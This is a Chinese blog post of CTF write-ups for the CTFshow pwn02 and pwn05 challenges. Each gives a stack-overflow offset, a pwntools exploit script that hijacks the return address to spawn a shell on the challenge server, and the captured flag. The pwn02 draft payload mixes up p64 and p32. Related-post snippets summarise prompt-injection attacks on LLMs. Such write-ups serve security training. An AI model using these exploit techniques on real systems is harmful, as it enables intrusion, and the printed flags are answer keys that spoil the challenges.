CTFshow-pwn刷题

已于 2025-01-01 19:09:08 修改
阅读量489 收藏 4
点赞数 23
CC 4.0 BY-SA版权
分类专栏: CTFshow 文章标签: 安全 大数据 运维 web安全 网络 linux c语言
于 2025-01-01 19:08:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CLAY0011/article/details/144870801

pwn02

32位的

双击pwnme这个函数

fgets函数,栈溢出

s的地址是-9,目标r的地址是4

这里有一个stack函数

地址是0x804850F

payload:

payload = b'a'*(0x9+4) + p64(0x0804850F)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28185)
payload = b'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{95cc7be7-bc2d-412b-9633-7131b3b507c3}

pwn05

32位的

F5main函数之后

双击welcome

双击s

s的地址是-14,目标地址r是4

getFlag的地址是:

0x8048486

构造payload

payload=b"a"*(0x14+4)+p32(0x08048486)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28169)
payload=b"a"*(0x12+6)+p32(0x08048486)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{33456f1e-e589-4481-8e0c-465b3317b85d}

ctfshow笔记(pwn篇)
Gygert的博客
03-16 4062
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow笔记—栈溢出pwn53~pwn56
Yilanchia的博客
02-19 771
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
ctf.show--pwn入门做记录(一)
2401_87685579的博客
11-16 412
ctfshow的个人做思路
ctfshow pwn记录
qq_73089613的博客
04-18 768
正式开始栈溢出了,先来一个最最最最简单的吧首先使用checksec查保护:32位程序,开启了堆栈不可执行保护。首先运行一下:发现他会打开根目录下的文件,但是并不对其进行输出。这里使用ida进行反编译:发现,程序读取文件后存入flag变量中,但不打印,然后打印字符串,进入验证argv[1]的值,但是程序中并没有给定输入argv数组的功能,然后根据argv[1]的值输出不同的字符,其中,当argc >= 1时,会进入ctfshow函数中,进入观察:发现使用strcpy。
ctfshow-萌新赛笔记
wyjcxyyy的博客
03-15 914
启动靶机,发现是sql注入,尝试后发现'被转义\,思路到这里就断了,再看目给她,想到git.有可能是.git文件泄露,dirsearch扫描一下果然是,用GitHack看一下git备份文件,得到hint.php。这里用到了sprintf函数,addslasheshes函数addslashes 是 PHP 中的一个内置函数,用于对字符串中的特殊字符进行转义,通常用于防止这些字符破坏 SQL 查询语句的结构。
BUUCTF-PWN记录25(IO file attack)
weixin_44145820的博客
08-14 1741
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
Pwn记录(不停更新)
qq_66013948的博客
06-23 467
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2421
经典栈溢出漏洞。
ctfshow pwn入门20
03-19
好的,我现在需要帮助用户找到CTFShow平台上关于PWN入门的解和教程。首先,用户提到了他们之前做过pwn02和pwn03,参考了相关的引用内容。我得先回忆一下CTFShowPWN目的结构,通常入门会从基础栈溢出开始,...
NSSCTF笔记pwn9——[GFCTF 2021]where_is_shell
qq_45692883的博客
02-02 874
然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中。$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541。然后我们还需要一个ret的地址,否则本地能打通,远程打不通。存在一个提示函数,代码报红,说明存在问,看一下机械码。有system函数,但是不存在/bin/sh字符串。可以看到\x24 \x30对应的是$0。main函数,存在很明显的栈溢出。找到地址 0x4005e3。
ctfshow 内部赛签到
08-28
- *2* *3* [ctfshow 内部赛 pwn 签到](https://blog.youkuaiyun.com/SCP000111/article/details/121353677)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
网络初级安全第三次作业
2302_81663869的博客
07-22 291
通用容器标签,用于分组其他元素,便于通过 CSS 统一样式或通过 JavaScript 操作。一级标标签,用于显示页面的主要标(此处为 “账户登录”),具有语义化含义,也影响搜索引擎排名。包含 CSS 样式代码,用于控制页面元素的布局和外观(如颜色、大小、间距等)。包含 JavaScript 代码,用于实现交互逻辑(如表单验证、提交处理等)。包含页面的元数据(不直接显示在页面上的信息),如字符集、标、样式等。定义页面标,显示在浏览器标签页上,也用于搜索引擎索引。表单标签,用于创建用户输入表单。
4G车载录像机的作用详解:提升行车安全与智能管理的核心技术
最新发布
索迪迈科技
07-22 410
随着物流运输、公共交通、特种车辆等行业对安全与管理需求的提升,4G车载录像机已成为现代车辆智能化管理的重要组成部分。它不仅具备传统行车记录仪的录像功能,还结合4G无线通信、AI智能分析、GPS定位、云存储等技术,实现远程监控、实时调度、驾驶员行为管理等功能。本文将详细解析4G车载录像机的作用,涵盖其在安全管理、车队运营、事故处理、数据管理等方面的核心价值。
Web LLM 安全剖析:以间接提示注入为核心的攻击案例与防御体系
专注网络安全领域,聚焦实战技术的 “白话解读” 和入门级操作指南。
07-21 925
LLM面临提示注入(含直接和间接,间接可通过外部源植入恶意指令)、训练数据中毒(污染训练数据致输出错误信息)、敏感数据泄露(被诱导泄露训练数据中敏感信息)等攻击;实战中可通过评论注入指令、利用不安全输出等方式实施攻击。防御需强化API权限(加身份验证,由应用控权限)、管好敏感数据(清理训练数据、给LLM最小权限)、不依赖提示词防御(需技术手段)。
自动化与安全 - 将 Terraform 集成到 CI/CD
weixin_42587823的博客
07-21 993
今天,我们为整个 IaC 的实践旅程画上了完美的句号。我们把之前所有学到的知识——HCL 语法、模块化、远程状态管理——全部串联起来,并将其置于一个自动化、安全、且遵循 SRE 最佳实践的 CI/CD 流水线之中。
禁止拖动视频进度条来保障视频安全
欢迎来到caibao的博客
07-18 533
在知识付费与企业培训场景中,视频内容安全是核心诉求。学员随意拖动进度条可能导致关键知识点遗漏,甚至助长盗录行为。本文深入解析HTML5播放器禁止拖拽进度条的技术方案,通过精准控制播放行为保障学习效果与内容安全。以企业培训、在线教育为例,探讨如何借助技术手段平衡用户体验与内容防护,为开发者提供可直接落地的代码实例。禁止拖动进度条是企业级视频安全的刚需功能,前端代码方案虽简易但存在安全缺口。真正的视频防护需从前端播放控制、内容加密、行为追踪三维发力。
等保2.0详解:筑牢数字时代安全基石
qq_39980997的博客
07-22 426
在数字化转型加速演进的今天,网络安全已成为国家安全的核心命脉。等保2.0作为我国网络安全体系的重大战略升级,以《网络安全法》为基石,突破传统防护边界,构建"一个中心三重防护"的创新架构。
【PGCCC】在 Postgres 中构建复制安全的 LSM 树
PGCCC的博客
07-22 808
本文探讨了在PostgreSQL中实现日志结构化合并树(LSM树)时遇到的复制安全挑战。传统B树和GIN索引虽优化查找但写入吞吐受限,而LSM树通过内存缓冲和分段合并实现高效写入。研究发现PostgreSQL的WAL传输机制不足以保证LSM树的复制安全,主要体现在:1)多缓冲区操作缺乏原子性会导致结构损坏;2)VACUUM操作与并发查询冲突会破坏逻辑一致性。解决方案包括:使用写时复制技术保证物理一致性,启用hot_standby_feedback参数让备库反馈查询状态以避免数据提前清理。这些措施使LSM树在
亚马逊自养号测评实战指南:从环境搭建到安全提排名
m0_61644681的博客
07-21 391
成功要素失败陷阱独立硬件环境+住宅IP共享IP/虚拟机环境渐进式行为模拟自动化脚本操作资源唯一性(支付卡/地址)黑卡或重复资料测评占比≤20%测评单量超过自然流量动态适应平台算法固守过时技术稳定的自养号系统需以技术合规为基石,通过精细化运营模拟真实用户,并严格控制数据比例。技术漏洞或急功近利的操作(如追求短期销量暴增)是封店主因。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小丑001.

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值